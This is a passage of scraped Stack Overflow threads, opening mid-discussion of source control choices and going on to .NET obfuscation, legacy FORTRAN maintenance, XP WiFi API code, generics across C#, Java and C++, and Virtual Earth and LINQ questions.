VSS, though it is fairly expensive for such a small team. I have not used git so I can't really speak to it. A: i used vss for years until switching to svn about two years ago. my biggest complaints about vss were the poor network performance (that problem may be solved now) and the pessimistic locking of files. svn solved both those, is easy to set up (i use collabnet server and tortoisesvn client, although there are two good visual studio plugins: visualsvn - commercial, and ankhsvn - open source), easy to use and administer, and well documented. it's tempting to say "if it's not broken then don't fix it" but you would get to learn a more modern source control tool and, perhaps more importantly, new ways of using source control (e.g. more frequent branching and merging) that the new tool would support. A: If you only have 2 people, and you mostly work independantly, git is going to give you a lot more flexibility, power, and be far and away the fastest to work with. It is however a pain in the backside to use. Using VSS you're obviously programming for windows - if you're doing Win32 API stuff in C then git will be a learning curve but will be quite interesting. If the depths of your knowledge however only extend to ASP and Visual Basic, just use subversion. Walk before you can run. ** I'm not trying to say if you only know VB you're dumb or anything like that, but that git can be very finicky and picky to use (if you've used the WinAPI in C you know all about picky and finicky), and you may want a more gradual introduction to SCM than git provides A: If you are a one man show and strictly a Microsoft shop, then SourceGear Vault is definitely a prime candidate for switching too. Features: * *Free for Single User, great for you *It uses SQL Server for it's backend, therefore data reliability is huge *It has atomic check-ins, all files checked-in at the same time are arranged in a group and are called a changeset. *VisualStudio integration. *Has a tool for importing from SourceSafe, therefore you can keep your history *The client communicates with the server over HTTP, therefore accessing the source outside the office remotely can be setup very easily and performs well, because they only transfer the deltas of the changes being submitted and received. You can use SSL to secure the connection. I would definately consider this as an option. A: If you want a full Life Cycle in one package then you probably want want to look at Visual Studio Team System. It does require a server, but you can get a "Action Pack" from MS that includes all the licencies that you need for "Team Foundation Server Workgroup Edition" from the Partner centre. With this you will get Bug, Risk and Issue tracking as well as many other features :) * *Source Control *Work Item Tracking (Requirements, Bugs, Issues, Risks and Tasks) *Reporting on your project data (Work Item Tracking, Build, Checkins and more in one qube) *Code Analysis *Unit Testing *Load Testing *Performance Analysis *Automated Build
{ "language": "en", "url": "https://stackoverflow.com/questions/31627", "timestamp": "2023-03-29T00:00:00", "source": "stackexchange", "question_score": "12" }
Q: Remove Meta Data from .NET applications? Is this possible? Does the .NET framework depend on the meta data in the bytecode? I'd like to have an application i write not work in reflector or a similar .NET decompiler. A: If you remove the metadata the framework won't be able to load your code, or figure out which other assemblies it references, or anything like that, so no, that's not a good idea. Obfuscators will make it a lot harder for an 'attacker' to decompile your code, but at the end of the day if someone is motivated and smart there's not a lot you can do to stop them. .NET will always compile down to MSIL, and MSIL is inherently easier to read than raw x86. That's just one of the tradeoffs you make for using .NET. Don't worry about it. The source code to apache, linux, and everything else is freely available on the net, but it's not providing much competitive advantage to microsoft is it :-) A: I think you are referring to the Assembly Manifest: Every assembly, whether static or dynamic, contains a collection of data that describes how the elements in the assembly relate to each other. The assembly manifest contains this assembly metadata. An assembly manifest contains all the metadata needed to specify the assembly's version requirements and security identity, and all metadata needed to define the scope of the assembly and resolve references to resources and classes. One of the most important features of .Net assemblies is that they are self-describing components and this is provided by the manifest. So removing them will somehow defeat its purpose. A: This looks like the same question as: How do I make the manifest of a .net assembly private? See my answer there: How do I make the manifest of a .net assembly private? "I think what you're talking about is "obfuscation". There are lots of articles about it on the net: http://en.wikipedia.org/wiki/Obfuscation The "standard" tool for obfuscation on .NET is by Preemptive Solutions: http://www.preemptive.com/obfuscator.html They have a community edition that ships with Visual Studio which you can use. You mentioned ILDasm, have you looked at the .NET Reflector? http://aisto.com/roeder/dotnet/ It gives you an even better idea as to what people can see if you release a manifest!" A: I don't think you can remove the meta data, but you can obfuscate your code if you're looking to protect your IP. A: The Dotfuscator will stop your code from being able to be decompiled http://www.preemptive.com/dotfuscator.html Edit: I should have mentioned, that's the professional version, the free community version ships with visual studio A: Wouldn't solutions like VMware's ThinApp (Formerly Thinstall) help a bit with protecting your code also? It comes at an extremely high price though..
{ "language": "en", "url": "https://stackoverflow.com/questions/31637", "timestamp": "2023-03-29T00:00:00", "source": "stackexchange", "question_score": "2" }
Q: Learning FORTRAN In the Modern Era I've recently come to maintain a large amount of scientific calculation-intensive FORTRAN code. I'm having difficulties getting a handle on all of the, say, nuances, of a forty year old language, despite google & two introductory level books. The code is rife with "performance enhancing improvements". Does anyone have any guides or practical advice for de-optimizing FORTRAN into CS 101 levels? Does anyone have knowledge of how FORTRAN code optimization operated? Are there any typical FORTRAN 'gotchas' that might not occur to a Java/C++/.NET raised developer taking over a FORTRAN 77/90 codebase? A: You kind of have to get a "feel" for what programmers had to do back in the day. The vast majority of the code I work with is older than I am and ran on machines that were "new" when my parents were in high school. Common FORTRAN-isms I deal with, that hurt readability are: * *Common blocks *Implicit variables *Two or three DO loops with shared CONTINUE statements *GOTO's in place of DO loops *Arithmetic IF statements *Computed GOTO's *Equivalence REAL/INTEGER/other in some common block Strategies for solving these involve: * *Get Spag / plusFORT, worth the money, it solves a lot of them automatically and Bug Free(tm) *Move to Fortran 90 if at all possible, if not move to free-format Fortran 77 *Add IMPLICIT NONE to each subroutine and then fix every compile error, time consuming but ultimately necessary, some programs can do this for you automatically (or you can script it) *Moving all COMMON blocks to MODULEs, low hanging fruit, worth it *Convert arithmetic IF statements to IF..ELSEIF..ELSE blocks *Convert computed GOTOs to SELECT CASE blocks *Convert all DO loops to the newer F90 syntax myloop: do ii = 1, nloops ! do something enddo myloop *Convert equivalenced common block members to either ALLOCATABLE memory allocated in a module, or to their true character routines if it is Hollerith being stored in a REAL If you had more specific questions as to how to accomplish some readability tasks, I can give advice. I have a code base of a few hundred thousand lines of Fortran which was written over the span of 40 years that I am in some way responsible for, so I've probably run across any "problems" you may have found. A: As someone with experience in both FORTRAN (77 flavor although it has been a while since I used it seriously) and C/C++ the item to watch out for that immediately jumps to mind are arrays. FORTRAN arrays start with an index of 1 instead of 0 as they do in C/C++/Java. Also, memory arrangement is reversed. So incrementing the first index gives you sequential memory locations. My wife still uses FORTRAN regularly and has some C++ code she needs to work with now that I'm about to start helping her with. As issues come up during her conversion I'll try to point them out. Maybe they will help. A: I have used Fortran starting with the '66 version since 1967 (on an IBM 7090 with 32k words of memory). I then used PL/1 for some time, but later went back to Fortran 95 because it is ideally suited for the matrix/complex-number problems we have. I would like to add to the considerations that much of the convoluted structure of old codes is simply due to the small amount of memory available, forcing such thing like reusing a few lines of code via computed or assigned GOTOs. Another problem is optimization by defining auxiliary variables for every repeated subexpression - compilers simply did not optimize for that. In addition, it was not allowed to write DO i=1,n+1; you had to write n1=n+1; DO i=1,n1. In consequence old codes are overwhelmed with superfluous variables. When I rewrote a code in Fortran 95, only 10% of the variables survived. If you want to make the code more legible, I highly recommend looking for variables that can easily be eliminated. Another thing I might mention is that for many years complex arithmetic and multidimensional arrays were highly inefficient. That is why you often find code rewritten to do complex calculations using only real variables, and matrices addressed with a single linear index. A: Well, in one sense, you're lucky, 'cause Fortran doesn't have much in the way of subtle flow-of-control constructs or inheritance or the like. On the other, it's got some truly amazing gotchas, like the arithmetically-calculated branch-to-numeric-label stuff, the implicitly-typed variables which don't require declaration, the lack of true keywords. I don't know about the "performance enhancing improvements". I'd guess most of them are probably ineffective, as a couple of decades of compiler technology have made most hinting unnecessary. Unfortunately, you'll probably have to leave things the way they are, unless you're planning to do a massive rewrite. Anyway, the core scientific calculation code should be fairly readable. Any programming language using infix arithmetic would be good preparation for reading Fortran's arithmetic and assignment code. A: Could you explain what you have to do in maintaining the code? Do you really have to modify the code? If you can get away by modifying just the interface to that code instead of the code itself, that would be the best. The inherent problem when dealing with a large scientific code (not just FORTRAN) is that the underlying mathematics and the implementation are both complex. Almost by default, the implementation has to include code optimization, in order to run within reasonable time frame. This is compounded by the fact that a lot of code in this field is created by scientists / engineers that are expert in their field, but not in software development. Let's just say that "easy to understand" is not the first priority to them (I was one of them, still learning to be a better software developer). Due to the nature of the problem, I don't think a general question and answer is enough to be helpful. I suggest you post a series of specific questions with code snippet attached. Perhaps starting with the one that gives you the most headache? A: I loved FORTRAN, I used to teach and code in it. Just wanted to throw that in. Haven't touched it in years. I started out in COBOL, when I moved to FORTRAN I felt I was freed. Everything is relative, yeah? I'd second what has been said above - recognise that this is a PROCEDURAL language - no subtelties - so take it as you see it. Probably frustrate you to start with. A: Legacy Fortran Soapbox I helped maintain/improve a legacy Fortran code base for quite a while and for the most part think sixlettervariables is on the money. That advice though, tends to the technical; a tougher row to hoe is in implementing "good practices". * *Establish a required coding style and coding guidelines. *Require a code review (of more than just the coder!) for anything submitted to the code base. (Version control should be tied to this process.) *Start building and running unit tests; ditto benchmark or regression tests. These might sound like obvious things these days, but at the risk of over-generalizing, I claim that most Fortran code shops have an entrenched culture, some started before the term "software engineering" even existed, and that over time what comes to dominate is "Get it done now". (This is not unique to Fortran shops by any means.) Embracing Gotchas But what to do with an already existing, grotty old legacy code base? I agree with Joel Spolsky on rewriting, don't. However, in my opinion sixlettervariables does point to the allowable exception: Use software tools to transition to better Fortran constructs. A lot can be caught/corrected by code analyzers (FORCHECK) and code rewriters (plusFORT). If you have to do it by hand, make sure you have a pressing reason. (I wish I had on hand a reference to the number of software bugs that came from fixing software bugs, it is humbling. I think some such statistic is in Expert C Programming.) Probably the best offense in winning the game of Fortran gotchas is having the best defense: Knowing the language fairly well. To further that end, I recommend ... books! Fortran Dead Tree Library I have had only modest success as a "QA nag" over the years, but I have found that education does work, some times inadvertently, and that one of the most influential things is a reference book that someone has on hand. I love and highly recommend Fortran 90/95 for Scientists and Engineers, by Stephen J. Chapman The book is even good with Fortran 77 in that it specifically identifies the constructs that shouldn't be used and gives the better alternatives. However, it is actually a textbook and can run out of steam when you really want to know the nitty-gritty of Fortran 95, which is why I recommend Fortran 90/95 Explained, by Michael Metcalf & John K. Reid as your go-to reference (sic) for Fortran 95. Be warned that it is not the most lucid writing, but the veil will lift when you really want to get the most out of a new Fortran 95 feature. For focusing on the issues of going from Fortran 77 to Fortran 90, I enjoyed Migrating to Fortran 90, by Jim Kerrigan but the book is now out-of-print. (I just don't understand O'Reilly's use of Safari, why isn't every one of their out-of-print books available?) Lastly, as to the heir to the wonderful, wonderful classic, Software Tools, I nominate Classical FORTRAN, by Michael Kupferschmid This book not only shows what one can do with "only" Fortran 77, but it also talks about some of the more subtle issues that arise (e.g., should or should not one use the EXTERNAL declaration). This book doesn't exactly cover the same space as "Software Tools" but they are two of the three Fortran programming books that I would tag as "fun".... (here's the third). Miscellaneous Advice that applies to almost every Fortran compiler * *There is a compiler option to enforce IMPLICIT NONE behavior, which you can use to identify problem routines without modifying them with the IMPLICIT NONE declaration first. This piece of advice won't seem meaningful until after the first time a build bombs because of an IMPLICIT NONE command inserted into a legacy routine. (What? Your code review didn't catch this? ;-) *There is a compiler option for array bounds checking, which can be useful when debugging Fortran 77 code. *Fortran 90 compilers should be able to compile almost all Fortran 77 code and even older Fortran code. Turn on the reporting options on your Fortran 90 compiler, run your legacy code through it and you will have a decent start on syntax checking. Some commercial Fortran 77 compilers are actually Fortran 90 compilers that are running in Fortran 77 mode, so this might be relatively trivial option twiddling for whatever build scripts you have. A: I started on Fortran IV (WATFIV) on punch cards, and my early working years were VS FORTRAN v1 (IBM, Fortran 77 level). Lots of good advice in this thread. I would add that you have to distinguish between things done to get the beast to run at all, versus things that "optimize" the code, versus things that are more readable and maintainable. I can remember dealing with VAX overlays in trying to get DOE simulation code to run on IBM with virtual memory (they had to be removed and the whole thing turned into one address space). I would certainly start by carefully restructuring FORTRAN IV control structures to at least FORTRAN 77 level, with proper indentation and commenting. Try to get rid of primitive control structures like ASSIGN and COMPUTED GOTO and arithmetic IF, and of course, as many GOTOs as you can (using IF-THEN-ELSE-ENDIF). Definitely use IMPLICIT NONE in every routine, to force you to properly declare all variables (you wouldn't believe how many bugs I caught in other people's code -- typos in variable names). Watch out for "premature optimizations" that you're better off letting the compiler handle by itself. If this code is to continue to live and be maintainable, you owe it to yourself and your successors to make it readable and understandable. Just be certain of what you are doing as you change the code! FORTRAN has lots of peculiar constructs that can easily trip up someone coming from the C side of the programming world. Remember than FORTRAN dates back to the mid-late '50s, when there was no such thing as a science of language and compiler design, just ad hoc hacking together of something (sorry, Dr. B!). A: There's something in the original question that I would caution about. You say the code is rife with "performance enhancing improvements". Since Fortran problems are generally of a scientific and mathematical nature, do not assume these performance tricks are there to improve the compilation. It's probably not about the language. In Fortran, the solution is seldom about efficiency of the code itself but of the underlying mathematics to solve the end problem. The tricks may make the compilation slower, may even make the logic appear messy, but the intent is to make the solution faster. Unless you know exactly what it is doing and why, leave it alone. Even simple refactoring, like changing dumb looking variable names can be a big pitfall. Historically standard mathematical equations in a given field of science will have used a particular shorthand since the days of Maxwell. So to see an array named B(:) in electromagnetics tells all Emag engineers exactly what is being solved for. Change that at your peril. Moral, get to know the standard nomenclature of the science before renaming too. A: Here's another one that has bit me from time to time. When you are working on FORTRAN code make sure you skip all six initial columns. Every once and a while, I'll only get the code indented five spaces and nothing works. At first glance everything seems okay and then I finally realize that all the lines are starting in column 6 instead of column 7. For anyone not familiar with FORTRAN, the first 5 columns are for line numbers (=labels), the 6th column is for a continuation character in case you have a line longer than 80 characters (just put something here and the compiler knows that this line is actually part of the one before it) and code always starts in column 7.
{ "language": "en", "url": "https://stackoverflow.com/questions/31672", "timestamp": "2023-03-29T00:00:00", "source": "stackexchange", "question_score": "80" }
Q: Wifi Management on XP (SP2/SP3) Wifi support on Vista is fine, but Native Wifi on XP is half baked. NDIS 802.11 Wireless LAN Miniport Drivers only gets you part of the way there (e.g. network scanning). From what I've read (and tried), the 802.11 NDIS drivers on XP will not allow you to configure a wireless connection. You have to use the Native Wifi API in order to do this. (Please, correct me if I'm wrong here.) Applications like InSSIDer have helped me to understand the APIs, but InSSIDer is just a scanner and is not designed to configure Wifi networks. So, the question is: where can I find some code examples (C# or C++) that deal with the configuration of Wifi networks on XP -- e.g. profile creation and connection management? I should note that this is a XP Embedded application on a closed system where we can't use the built-in Wireless Zero Configuration (WZC). We have to build all Wifi management functionality into our .NET application. Yes, I've Googled myself blue. It seems that someone should have a solution to this problem, but I can't find it. That's why I'm asking here. Thanks. A: We use WZC on XP and Native WiFi on Vista, but here's the code which we use on Vista, FWIW. Profile creation: // open a handle to the service if ((dwError = WlanOpenHandle( WLAN_API_VERSION, NULL, // reserved &dwServiceVersion, &hClient )) != ERROR_SUCCESS) { hClient = NULL; } return dwError; dwError=WlanSetProfile(hClient, &guid, 0, profile, NULL, TRUE, NULL, &reason_code); Make a connection: WLAN_CONNECTION_PARAMETERS conn; conn.wlanConnectionMode=wlan_connection_mode_profile; conn.strProfile=name; conn.pDot11Ssid=NULL; conn.pDesiredBssidList=NULL; conn.dot11BssType=dot11_BSS_type_independent; conn.dwFlags=NULL; dwError = WlanConnect(hClient, &guid, &conn, NULL); Check for connection: BOOL ret=FALSE; DWORD dwError; DWORD size; void *p=NULL; WLAN_INTERFACE_STATE *ps; dwError = WlanQueryInterface(hClient, &guid, wlan_intf_opcode_interface_state, NULL, &size, &p, NULL); ps=(WLAN_INTERFACE_STATE *)p; if(dwError!=0) ret=FALSE; else if(*ps==wlan_interface_state_connected) ret=TRUE; if(p!=NULL) WlanFreeMemory(p); return ret; To keep connected to the network, just spawn a thread then keep checking for a connection, then re-connecting if need be. EDIT: Man this markup stuff is lame. Takes me like 3 edits to get the farking thing right. A: Thanks for the feedback Nick. I've pretty much gotten the profile and connection management working. The trick is figuring out which parts of the Native Wifi API are not supported on XP. Fortunately, the Managed Wifi API has connect/disconnect notification events that do work on XP (NetworkChange also gives similar change events).
{ "language": "en", "url": "https://stackoverflow.com/questions/31673", "timestamp": "2023-03-29T00:00:00", "source": "stackexchange", "question_score": "-1" }
Q: What are the differences between Generics in C# and Java... and Templates in C++? I mostly use Java and generics are relatively new. I keep reading that Java made the wrong decision or that .NET has better implementations etc. etc. So, what are the main differences between C++, C#, Java in generics? Pros/cons of each? A: C++ rarely uses the “generics” terminology. Instead, the word “templates” is used and is more accurate. Templates describes one technique to achieve a generic design. C++ templates is very different from what both C# and Java implement for two main reasons. The first reason is that C++ templates don't only allow compile-time type arguments but also compile-time const-value arguments: templates can be given as integers or even function signatures. This means that you can do some quite funky stuff at compile time, e.g. calculations: template <unsigned int N> struct product { static unsigned int const VALUE = N * product<N - 1>::VALUE; }; template <> struct product<1> { static unsigned int const VALUE = 1; }; // Usage: unsigned int const p5 = product<5>::VALUE; This code also uses the other distinguished feature of C++ templates, namely template specialization. The code defines one class template, product that has one value argument. It also defines a specialization for that template that is used whenever the argument evaluates to 1. This allows me to define a recursion over template definitions. I believe that this was first discovered by Andrei Alexandrescu. Template specialization is important for C++ because it allows for structural differences in data structures. Templates as a whole is a means of unifying an interface across types. However, although this is desirable, all types cannot be treated equally inside the implementation. C++ templates takes this into account. This is very much the same difference that OOP makes between interface and implementation with the overriding of virtual methods. C++ templates are essential for its algorithmic programming paradigm. For example, almost all algorithms for containers are defined as functions that accept the container type as a template type and treat them uniformly. Actually, that's not quite right: C++ doesn't work on containers but rather on ranges that are defined by two iterators, pointing to the beginning and behind the end of the container. Thus, the whole content is circumscribed by the iterators: begin <= elements < end. Using iterators instead of containers is useful because it allows to operate on parts of a container instead of on the whole. Another distinguishing feature of C++ is the possibility of partial specialization for class templates. This is somewhat related to pattern matching on arguments in Haskell and other functional languages. For example, let's consider a class that stores elements: template <typename T> class Store { … }; // (1) This works for any element type. But let's say that we can store pointers more effciently than other types by applying some special trick. We can do this by partially specializing for all pointer types: template <typename T> class Store<T*> { … }; // (2) Now, whenever we instance a container template for one type, the appropriate definition is used: Store<int> x; // Uses (1) Store<int*> y; // Uses (2) Store<string**> z; // Uses (2), with T = string*. A: Both Java and C# introduced generics after their first language release. However, there are differences in how the core libraries changed when generics was introduced. C#'s generics are not just compiler magic and so it was not possible to generify existing library classes without breaking backwards compatibility. For example, in Java the existing Collections Framework was completely genericised. Java does not have both a generic and legacy non-generic version of the collections classes. In some ways this is much cleaner - if you need to use a collection in C# there is really very little reason to go with the non-generic version, but those legacy classes remain in place, cluttering up the landscape. Another notable difference is the Enum classes in Java and C#. Java's Enum has this somewhat tortuous looking definition: // java.lang.Enum Definition in Java public abstract class Enum<E extends Enum<E>> implements Comparable<E>, Serializable { (see Angelika Langer's very clear explanation of exactly why this is so. Essentially, this means Java can give type safe access from a string to its Enum value: // Parsing String to Enum in Java Colour colour = Colour.valueOf("RED"); Compare this to C#'s version: // Parsing String to Enum in C# Colour colour = (Colour)Enum.Parse(typeof(Colour), "RED"); As Enum already existed in C# before generics was introduced to the language, the definition could not change without breaking existing code. So, like collections, it remains in the core libraries in this legacy state. A: 11 months late, but I think this question is ready for some Java Wildcard stuff. This is a syntactical feature of Java. Suppose you have a method: public <T> void Foo(Collection<T> thing) And suppose you don't need to refer to the type T in the method body. You're declaring a name T and then only using it once, so why should you have to think of a name for it? Instead, you can write: public void Foo(Collection<?> thing) The question-mark asks the the compiler to pretend that you declared a normal named type parameter that only needs to appear once in that spot. There's nothing you can do with wildcards that you can't also do with a named type parameter (which is how these things are always done in C++ and C#). A: I'll add my voice to the noise and take a stab at making things clear: C# Generics allow you to declare something like this. List<Person> foo = new List<Person>(); and then the compiler will prevent you from putting things that aren't Person into the list. Behind the scenes the C# compiler is just putting List<Person> into the .NET dll file, but at runtime the JIT compiler goes and builds a new set of code, as if you had written a special list class just for containing people - something like ListOfPerson. The benefit of this is that it makes it really fast. There's no casting or any other stuff, and because the dll contains the information that this is a List of Person, other code that looks at it later on using reflection can tell that it contains Person objects (so you get intellisense and so on). The downside of this is that old C# 1.0 and 1.1 code (before they added generics) doesn't understand these new List<something>, so you have to manually convert things back to plain old List to interoperate with them. This is not that big of a problem, because C# 2.0 binary code is not backwards compatible. The only time this will ever happen is if you're upgrading some old C# 1.0/1.1 code to C# 2.0 Java Generics allow you to declare something like this. ArrayList<Person> foo = new ArrayList<Person>(); On the surface it looks the same, and it sort-of is. The compiler will also prevent you from putting things that aren't Person into the list. The difference is what happens behind the scenes. Unlike C#, Java does not go and build a special ListOfPerson - it just uses the plain old ArrayList which has always been in Java. When you get things out of the array, the usual Person p = (Person)foo.get(1); casting-dance still has to be done. The compiler is saving you the key-presses, but the speed hit/casting is still incurred just like it always was. When people mention "Type Erasure" this is what they're talking about. The compiler inserts the casts for you, and then 'erases' the fact that it's meant to be a list of Person not just Object The benefit of this approach is that old code which doesn't understand generics doesn't have to care. It's still dealing with the same old ArrayList as it always has. This is more important in the java world because they wanted to support compiling code using Java 5 with generics, and having it run on old 1.4 or previous JVM's, which microsoft deliberately decided not to bother with. The downside is the speed hit I mentioned previously, and also because there is no ListOfPerson pseudo-class or anything like that going into the .class files, code that looks at it later on (with reflection, or if you pull it out of another collection where it's been converted into Object or so on) can't tell in any way that it's meant to be a list containing only Person and not just any other array list. C++ Templates allow you to declare something like this std::list<Person>* foo = new std::list<Person>(); It looks like C# and Java generics, and it will do what you think it should do, but behind the scenes different things are happening. It has the most in common with C# generics in that it builds special pseudo-classes rather than just throwing the type information away like java does, but it's a whole different kettle of fish. Both C# and Java produce output which is designed for virtual machines. If you write some code which has a Person class in it, in both cases some information about a Person class will go into the .dll or .class file, and the JVM/CLR will do stuff with this. C++ produces raw x86 binary code. Everything is not an object, and there's no underlying virtual machine which needs to know about a Person class. There's no boxing or unboxing, and functions don't have to belong to classes, or indeed anything. Because of this, the C++ compiler places no restrictions on what you can do with templates - basically any code you could write manually, you can get templates to write for you. The most obvious example is adding things: In C# and Java, the generics system needs to know what methods are available for a class, and it needs to pass this down to the virtual machine. The only way to tell it this is by either hard-coding the actual class in, or using interfaces. For example: string addNames<T>( T first, T second ) { return first.Name() + second.Name(); } That code won't compile in C# or Java, because it doesn't know that the type T actually provides a method called Name(). You have to tell it - in C# like this: interface IHasName{ string Name(); }; string addNames<T>( T first, T second ) where T : IHasName { .... } And then you have to make sure the things you pass to addNames implement the IHasName interface and so on. The java syntax is different (<T extends IHasName>), but it suffers from the same problems. The 'classic' case for this problem is trying to write a function which does this string addNames<T>( T first, T second ) { return first + second; } You can't actually write this code because there are no ways to declare an interface with the + method in it. You fail. C++ suffers from none of these problems. The compiler doesn't care about passing types down to any VM's - if both your objects have a .Name() function, it will compile. If they don't, it won't. Simple. So, there you have it :-) A: Anders Hejlsberg himself described the differences here "Generics in C#, Java, and C++". A: Wikipedia has great write-ups comparing both Java/C# generics and Java generics/C++ templates. The main article on Generics seems a bit cluttered but it does have some good info in it. A: There are already a lot of good answers on what the differences are, so let me give a slightly different perspective and add the why. As was already explained, the main difference is type erasure, i.e. the fact that the Java compiler erases the generic types and they don't end up in the generated bytecode. However, the question is: why would anyone do that? It doesn't make sense! Or does it? Well, what's the alternative? If you don't implement generics in the language, where do you implement them? And the answer is: in the Virtual Machine. Which breaks backwards compatibility. Type erasure, on the other hand, allows you to mix generic clients with non-generic libraries. In other words: code that was compiled on Java 5 can still be deployed to Java 1.4. Microsoft, however, decided to break backwards compatibility for generics. That's why .NET Generics are "better" than Java Generics. Of course, Sun aren't idiots or cowards. The reason why they "chickened out", was that Java was significantly older and more widespread than .NET when they introduced generics. (They were introduced roughly at the same time in both worlds.) Breaking backwards compatibility would have been a huge pain. Put yet another way: in Java, Generics are a part of the Language (which means they apply only to Java, not to other languages), in .NET they are part of the Virtual Machine (which means they apply to all languages, not just C# and Visual Basic.NET). Compare this with .NET features like LINQ, lambda expressions, local variable type inference, anonymous types and expression trees: these are all language features. That's why there are subtle differences between VB.NET and C#: if those features were part of the VM, they would be the same in all languages. But the CLR hasn't changed: it's still the same in .NET 3.5 SP1 as it was in .NET 2.0. You can compile a C# program that uses LINQ with the .NET 3.5 compiler and still run it on .NET 2.0, provided that you don't use any .NET 3.5 libraries. That would not work with generics and .NET 1.1, but it would work with Java and Java 1.4. A: Follow-up to my previous posting. Templates are one of the main reasons why C++ fails so abysmally at intellisense, regardless of the IDE used. Because of template specialization, the IDE can never be really sure if a given member exists or not. Consider: template <typename T> struct X { void foo() { } }; template <> struct X<int> { }; typedef int my_int_type; X<my_int_type> a; a.| Now, the cursor is at the indicated position and it's damn hard for the IDE to say at that point if, and what, members a has. For other languages the parsing would be straightforward but for C++, quite a bit of evaluation is needed beforehand. It gets worse. What if my_int_type were defined inside a class template as well? Now its type would depend on another type argument. And here, even compilers fail. template <typename T> struct Y { typedef T my_type; }; X<Y<int>::my_type> b; After a bit of thinking, a programmer would conclude that this code is the same as the above: Y<int>::my_type resolves to int, therefore b should be the same type as a, right? Wrong. At the point where the compiler tries to resolve this statement, it doesn't actually know Y<int>::my_type yet! Therefore, it doesn't know that this is a type. It could be something else, e.g. a member function or a field. This might give rise to ambiguities (though not in the present case), therefore the compiler fails. We have to tell it explicitly that we refer to a type name: X<typename Y<int>::my_type> b; Now, the code compiles. To see how ambiguities arise from this situation, consider the following code: Y<int>::my_type(123); This code statement is perfectly valid and tells C++ to execute the function call to Y<int>::my_type. However, if my_type is not a function but rather a type, this statement would still be valid and perform a special cast (the function-style cast) which is often a constructor invocation. The compiler can't tell which we mean so we have to disambiguate here. A: The biggest complaint is type erasure. In that, generics are not enforced at runtime. Here's a link to some Sun docs on the subject. Generics are implemented by type erasure: generic type information is present only at compile time, after which it is erased by the compiler. A: C++ templates are actually much more powerful than their C# and Java counterparts as they are evaluated at compile time and support specialization. This allows for Template Meta-Programming and makes the C++ compiler equivalent to a Turing machine (i.e. during the compilation process you can compute anything that is computable with a Turing machine). A: In Java, generics are compiler level only, so you get: a = new ArrayList<String>() a.getClass() => ArrayList Note that the type of 'a' is an array list, not a list of strings. So the type of a list of bananas would equal() a list of monkeys. So to speak. A: Looks like, among other very interesting proposals, there is one about refining generics and breaking backwards compatibility: Currently, generics are implemented using erasure, which means that the generic type information is not available at runtime, which makes some kind of code hard to write. Generics were implemented this way to support backwards compatibility with older non-generic code. Reified generics would make the generic type information available at runtime, which would break legacy non-generic code. However, Neal Gafter has proposed making types reifiable only if specified, so as to not break backward compatibility. at Alex Miller's article about Java 7 Proposals A: NB: I don't have enough point to comment, so feel free to move this as a comment to appropriate answer. Contrary to popular believe, which I never understand where it came from, .net implemented true generics without breaking backward compatibility, and they spent explicit effort for that. You don't have to change your non-generic .net 1.0 code into generics just to be used in .net 2.0. Both the generic and non-generic lists are still available in .Net framework 2.0 even until 4.0, exactly for nothing else but backward compatibility reason. Therefore old codes that still used non-generic ArrayList will still work, and use the same ArrayList class as before. Backward code compatibility is always maintained since 1.0 till now... So even in .net 4.0, you still have to option to use any non-generics class from 1.0 BCL if you choose to do so. So I don't think java has to break backward compatibility to support true generics.
{ "language": "en", "url": "https://stackoverflow.com/questions/31693", "timestamp": "2023-03-29T00:00:00", "source": "stackexchange", "question_score": "203" }
Q: How to control layer ordering in Virtual Earth I have a mapping application that needs to draw a path, and then display icons on top of the path. I can't find a way to control the order of virtual earth layers, other than the order in which they are added. Does anyone know how to change the z index of Virtual Earth shape layers, or force a layer to the front? A: I think the easiest way is to iterate through the shapes in your VEShapeLayer and use the VEShape.SetZIndex method. A: If you are using JQuery you can use the following $('#' + yourlayer.iid).children(".VEAPI_Pushpin").css('zIndex', 2000); ...remember that the default zIndex for a VEShape is 1000
{ "language": "en", "url": "https://stackoverflow.com/questions/31701", "timestamp": "2023-03-29T00:00:00", "source": "stackexchange", "question_score": "4" }
Q: How can I convert IEnumerable to List in C#? I am using LINQ to query a generic dictionary and then use the result as the datasource for my ListView (WebForms). Simplified code: Dictionary<Guid, Record> dict = GetAllRecords(); myListView.DataSource = dict.Values.Where(rec => rec.Name == "foo"); myListView.DataBind(); I thought that would work but in fact it throws a System.InvalidOperationException: ListView with id 'myListView' must have a data source that either implements ICollection or can perform data source paging if AllowPaging is true. In order to get it working I have had to resort to the following: Dictionary<Guid, Record> dict = GetAllRecords(); List<Record> searchResults = new List<Record>(); var matches = dict.Values.Where(rec => rec.Name == "foo"); foreach (Record rec in matches) searchResults.Add(rec); myListView.DataSource = searchResults; myListView.DataBind(); Is there a small gotcha in the first example to make it work? (Wasn't sure what to use as the question title for this one, feel free to edit to something more appropriate) A: I tend to prefer using the new Linq syntax: myListView.DataSource = ( from rec in GetAllRecords().Values where rec.Name == "foo" select rec ).ToList(); myListView.DataBind(); Why are you getting a dictionary when you don't use the key? You're paying for that overhead. A: You might also try: var matches = new List<Record>(dict.Values.Where(rec => rec.Name == "foo")); Basically generic collections are very difficult to cast directly, so you really have little choice but to create a new object. A: Try this: var matches = dict.Values.Where(rec => rec.Name == "foo").ToList(); Be aware that that will essentially be creating a new list from the original Values collection, and so any changes to your dictionary won't automatically be reflected in your bound control. A: myListView.DataSource = (List<Record>) dict.Values.Where(rec => rec.Name == "foo"); A: Just adding knowledge the next sentence doesn´t recover any data from de db. Just only create the query (for that it is iqueryable type). For launching this query you must to add .ToList() or .First() at the end. dict.Values.Where(rec => rec.Name == "foo")
{ "language": "en", "url": "https://stackoverflow.com/questions/31708", "timestamp": "2023-03-29T00:00:00", "source": "stackexchange", "question_score": "17" }
Q: How to plot a long path with Virtual Earth The obvious way to plot a path with virtual earth (VEMap.GetDirections) is limited to 25 points. When trying to plot a vehicle's journey this is extremely limiting. How can I plot a by-road journey of more than 25 points on a virtual earth map? A: According to this you need to call VEMap.GetDirections every 25 points until you reach the end of the route and then plot a custom shape of the complete route.
{ "language": "en", "url": "https://stackoverflow.com/questions/31711", "timestamp": "2023-03-29T00:00:00", "source": "stackexchange", "question_score": "3" }
